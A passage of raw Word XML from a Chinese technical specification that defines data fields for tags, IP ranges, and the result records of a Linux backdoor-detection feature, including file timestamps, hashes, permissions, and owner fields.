          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="670DA019" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4FAD3D58" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4542C63A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tagName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DBB7311" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3A1E68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="72199AF3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44173056" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tagColor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48A62523" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28EB9E03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签颜色</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B5A4F84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IpRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="711661A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2A962E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2743291B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="568CC2B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="39484592" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AE5ECE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7677AB6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67F83CFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C670B4B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24A1CA75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>endIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DE0AADD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F07E19C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结束</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28290C1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="457" w:name="_Toc115166301"/>
      <w:bookmarkStart w:id="458" w:name="附录1-linux后门检测-查询结果-detail数据结构"/>
      <w:bookmarkEnd w:id="442"/>
      <w:bookmarkEnd w:id="456"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录1 Linux后门检测-查询结果-detail数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="457"/>
    </w:p>
    <w:p w14:paraId="49C2CCDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>共同字段说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1661"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1988"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="096E3BD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13A1EB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DB82F10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DF24C95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3370CCD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28DCC756" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64FAF070" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E6D527" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="778BF22F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ED6FE0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件的最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48797E53" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38D7F1D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F6525B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76648CD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A7BBFCB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件内容的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66BA3287" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77F01D1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51995E50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03C40440" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11E3AEEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="528F67D2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103157FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50092A73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AAE57B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D66F9F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F56CC4A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="628EB1E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="174B4010" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CE55D2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4634B6D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4BC3E05E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FE81496" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="356AB94D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A538DB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5270C860" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件属性的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61E3EDD9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="348359A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E133DE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="333A7F6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6636DDB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20438BB6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0028852A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D893BE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04CAF33F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78E264D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="070F9E43" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A53857B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51349AA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A1D9969" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C933973" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件访问权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56F6428E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D372DA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48DE69A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="178828BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D8F211D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="239338EE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40642671" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D238342" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366F5C62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6937FA89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所属用户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61FBD029" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="459" w:name="_Toc115166302"/>
      <w:bookmarkStart w:id="460" w:name="检查功能dpkg-based应用后门检查rpm-based应用后门检查"/>
      <w:r>
        <w:t>检查功能：DPKG-based应用后门检查、RPM-based应用后门检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
    </w:p>
    <w:p w14:paraId="146D9C99"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2087"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4449"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D4982B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C1D5C0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D60F042" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AEDDAC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
